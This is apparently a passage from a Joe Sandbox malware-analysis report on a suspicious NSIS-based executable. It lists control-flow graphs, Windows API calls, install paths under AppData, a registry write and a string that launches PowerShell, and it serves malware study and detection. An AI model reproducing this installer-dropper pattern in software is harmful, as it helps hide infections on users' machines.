                                                  control_flow_graph 503 40176f-401794 call 402d3e call 405e88 508 401796-40179c call 40653c 503->508 509 40179e-4017b0 call 40653c call 405e11 lstrcatW 503->509 514 4017b5-4017b6 call 4067eb 508->514 509->514 518 4017bb-4017bf 514->518 519 4017c1-4017cb call 40689a 518->519 520 4017f2-4017f5 518->520 527 4017dd-4017ef 519->527 528 4017cd-4017db CompareFileTime 519->528 521 4017f7-4017f8 call 40600d 520->521 522 4017fd-401819 call 406032 520->522 521->522 530 40181b-40181e 522->530 531 40188d-4018b6 call 4055a4 call 403309 522->531 527->520 528->527 532 401820-40185e call 40653c * 2 call 406579 call 40653c call 405ba2 530->532 533 40186f-401879 call 4055a4 530->533 543 4018b8-4018bc 531->543 544 4018be-4018ca SetFileTime 531->544 532->518 565 401864-401865 532->565 545 401882-401888 533->545 543->544 547 4018d0-4018db CloseHandle 543->547 544->547 548 402bcb 545->548 551 4018e1-4018e4 547->551 552 402bc2-402bc5 547->552 553 402bcd-402bd1 548->553 555 4018e6-4018f7 call 406579 lstrcatW 551->555 556 4018f9-4018fc call 406579 551->556 552->548 562 401901-40239a call 405ba2 555->562 556->562 562->552 562->553 565->545 567 401867-401868 565->567 567->533
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,open,C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing,?,?,00000031), ref: 004017B0
                                                  • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing,?,?,00000031), ref: 004017D5
                                                    • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                                                    • Part of subcall function 004055A4: lstrlenW.KERNEL32(Crenature,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                                    • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,Crenature,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                                    • Part of subcall function 004055A4: lstrcatW.KERNEL32(Crenature,00403040,00403040,Crenature,00000000,00000000,00000000), ref: 004055FF
                                                    • Part of subcall function 004055A4: SetWindowTextW.USER32(Crenature,Crenature), ref: 00405611
                                                    • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                                    • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                                    • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing$Forkynders\baskets\acylate$open$open "powershell.exe"
                                                  • API String ID: 1941528284-2802192432
                                                  • Opcode ID: 3609216ee3f06f0c862fd5db81faf8ef7dd61e8af77c9b779afa9b65af1c9a51
                                                  • Instruction ID: 1f20f3305f5cdc04e1f2059eaac63a386f89c848407f65c8aae314978641b4a4
                                                  • Opcode Fuzzy Hash: 3609216ee3f06f0c862fd5db81faf8ef7dd61e8af77c9b779afa9b65af1c9a51
                                                  • Instruction Fuzzy Hash: 08419431500114BACF10BFB9DD85DAE7A79EF45729B20423FF422B10E2D73C8A519A6E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 569 4055a4-4055b9 570 405670-405674 569->570 571 4055bf-4055d0 569->571 572 4055d2-4055d6 call 406579 571->572 573 4055db-4055e7 lstrlenW 571->573 572->573 575 405604-405608 573->575 576 4055e9-4055f9 lstrlenW 573->576 577 405617-40561b 575->577 578 40560a-405611 SetWindowTextW 575->578 576->570 579 4055fb-4055ff lstrcatW 576->579 580 405661-405663 577->580 581 40561d-40565f SendMessageW * 3 577->581 578->577 579->575 580->570 582 405665-405668 580->582 581->580 582->570
                                                  APIs
                                                  • lstrlenW.KERNEL32(Crenature,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                                  • lstrlenW.KERNEL32(00403040,Crenature,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                                  • lstrcatW.KERNEL32(Crenature,00403040,00403040,Crenature,00000000,00000000,00000000), ref: 004055FF
                                                  • SetWindowTextW.USER32(Crenature,Crenature), ref: 00405611
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: Crenature
                                                  • API String ID: 2531174081-922222023
                                                  • Opcode ID: 821461bf1a3e0c9a0b9dfd66dfa0b62158b528cadb26a9773dc4f9578ba51fec
                                                  • Instruction ID: cea8892cb4e31635aa5f40387e4ea582d2b984c796fabda61e5f1d3d18a4122e
                                                  • Opcode Fuzzy Hash: 821461bf1a3e0c9a0b9dfd66dfa0b62158b528cadb26a9773dc4f9578ba51fec
                                                  • Instruction Fuzzy Hash: E6218E71900518BACB119F65DD44ECFBFB9EF45360F54443AF904B62A0C77A4A508FA8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 583 4068c1-4068e1 GetSystemDirectoryW 584 4068e3 583->584 585 4068e5-4068e7 583->585 584->585 586 4068f8-4068fa 585->586 587 4068e9-4068f2 585->587 589 4068fb-40692e wsprintfW LoadLibraryExW 586->589 587->586 588 4068f4-4068f6 587->588 588->589
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                                                  • wsprintfW.USER32 ref: 00406913
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406927
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME$\
                                                  • API String ID: 2200240437-1946221925
                                                  • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                  • Instruction ID: 979e31ef7f6a653eb027d6e7281dab5f214eebcb072a06bc6d9d9cfc9f176359
                                                  • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                  • Instruction Fuzzy Hash: BDF02B71501219A7CB14BB68DD0DF9B376CEB00304F10447EA646F10D0EB7CDA68CB98

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 590 406061-40606d 591 40606e-4060a2 GetTickCount GetTempFileNameW 590->591 592 4060b1-4060b3 591->592 593 4060a4-4060a6 591->593 595 4060ab-4060ae 592->595 593->591 594 4060a8 593->594 594->595
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0040607F
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\24100311.EXE.exe",004035D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822), ref: 0040609A
                                                  Strings
                                                  • nsa, xrefs: 0040606E
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406066
                                                  • "C:\Users\user\Desktop\24100311.EXE.exe", xrefs: 00406061
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\24100311.EXE.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-3208526724
                                                  • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                  • Instruction ID: f50322da3c8d1fbf3185d5aa4cbdefdd087cb84507cf15d2c2e6a21a41158221
                                                  • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                  • Instruction Fuzzy Hash: BBF09076741204BFEB00CF59DD05E9EB7BCEBA1710F11803AFA05F7240E6B499648768

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 596 401c43-401c63 call 402d1c * 2 601 401c65-401c6c call 402d3e 596->601 602 401c6f-401c73 596->602 601->602 603 401c75-401c7c call 402d3e 602->603 604 401c7f-401c85 602->604 603->604 608 401cd3-401cfd call 402d3e * 2 FindWindowExW 604->608 609 401c87-401ca3 call 402d1c * 2 604->609 619 401d03 608->619 620 401cc3-401cd1 SendMessageW 609->620 621 401ca5-401cc1 SendMessageTimeoutW 609->621 622 401d06-401d09 619->622 620->619 621->622 623 402bc2-402bd1 622->623 624 401d0f 622->624 624->623
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
                                                  • Instruction ID: 504b766b7349ebce22e5cc184c1b69e4e3709f4fc648736089561923f5a7a9d8
                                                  • Opcode Fuzzy Hash: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
                                                  • Instruction Fuzzy Hash: C221AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CB98

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 627 402482-4024b3 call 402d3e * 2 call 402dce 634 402bc2-402bd1 627->634 635 4024b9-4024c3 627->635 636 4024c5-4024d2 call 402d3e lstrlenW 635->636 637 4024d6-4024d9 635->637 636->637 640 4024db-4024ec call 402d1c 637->640 641 4024ed-4024f0 637->641 640->641 645 402501-402515 RegSetValueExW 641->645 646 4024f2-4024fc call 403309 641->646 648 402517 645->648 649 40251a-4025fb RegCloseKey 645->649 646->645 648->649 649->634 652 402925-40292c 649->652 652->634
                                                  APIs
                                                  • lstrlenW.KERNEL32(Forkynders\baskets\acylate,00000023,00000011,00000002), ref: 004024CD
                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,Forkynders\baskets\acylate,00000000,00000011,00000002), ref: 0040250D
                                                  • RegCloseKey.KERNELBASE(?,?,?,Forkynders\baskets\acylate,00000000,00000011,00000002), ref: 004025F5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: Forkynders\baskets\acylate
                                                  • API String ID: 2655323295-1311505000
                                                  • Opcode ID: b5d3adf7c291cd3c91136d371b2403c06450f2b6f45f2839c0b813c2869dcc41
                                                  • Instruction ID: c269879d92cf6aad1d98ff003e7813fc443ead00aa0a9254d290d0c4c068a2a6
                                                  • Opcode Fuzzy Hash: b5d3adf7c291cd3c91136d371b2403c06450f2b6f45f2839c0b813c2869dcc41
                                                  • Instruction Fuzzy Hash: 0311AF71E00108BEDB10AFA5DE49AAEBBB8EF44314F21443AF514F71D1D7B84D419628

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 736 4015c1-4015d5 call 402d3e call 405ebc 741 401631-401634 736->741 742 4015d7-4015ea call 405e3e 736->742 743 401663-4022ee call 401423 741->743 744 401636-401655 call 401423 call 40653c SetCurrentDirectoryW 741->744 749 401604-401607 call 405af0 742->749 750 4015ec-4015ef 742->750 759 402bc2-402bd1 743->759 760 402925-40292c 743->760 744->759 763 40165b-40165e 744->763 761 40160c-40160e 749->761 750->749 753 4015f1-4015f8 call 405b0d 750->753 753->749 767 4015fa-401602 call 405a73 753->767 760->759 765 401610-401615 761->765 766 401627-40162f 761->766 763->759 769 401624 765->769 770 401617-401622 GetFileAttributesW 765->770 766->741 766->742 767->761 769->766 770->766 770->769
                                                  APIs
                                                    • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0,00000000), ref: 00405ECA
                                                    • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                                                    • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                    • Part of subcall function 00405A73: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing,?,00000000,000000F0), ref: 0040164D
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing, xrefs: 00401640
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing
                                                  • API String ID: 1892508949-208476317
                                                  • Opcode ID: 1dbc07150a7b0890d6f2f0031742d4357183754cf59f93a338fe5439ed721fd4
                                                  • Instruction ID: 804c449170a8270e91f9515fbcc2e09aef6974e60d9951be020b7c668b26977e
                                                  • Opcode Fuzzy Hash: 1dbc07150a7b0890d6f2f0031742d4357183754cf59f93a338fe5439ed721fd4
                                                  • Instruction Fuzzy Hash: 1511E231504115ABCF30AFA5CD4199F36B0EF24329B28493BE956B12F1D63E4E829F5E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 773 40640a-40643c call 4063a9 776 40647a 773->776 777 40643e-40646c RegQueryValueExW RegCloseKey 773->777 778 40647e-406480 776->778 777->776 779 40646e-406472 777->779 779->778 780 406474-406478 779->780 780->776 780->778
                                                  APIs
                                                  • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,00406699,80000002), ref: 00406450
                                                  • RegCloseKey.KERNELBASE(?,?,00406699,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Crenature), ref: 0040645B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: : Completed
                                                  • API String ID: 3356406503-2954849223
                                                  • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                  • Instruction ID: f0f89c662eeec8a22638327002db2d2d8046b3273e4fa87c0bc9f0af31e9764c
                                                  • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                  • Instruction Fuzzy Hash: E1017172510209EBDF218F51CC05FDB3BB8EB54354F01403AFD55A2190D738D964DB94
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 00405B4E
                                                  • CloseHandle.KERNEL32(?), ref: 00405B5B
                                                  Strings
                                                  • Error launching installer, xrefs: 00405B38
                                                  Memory Dump Source
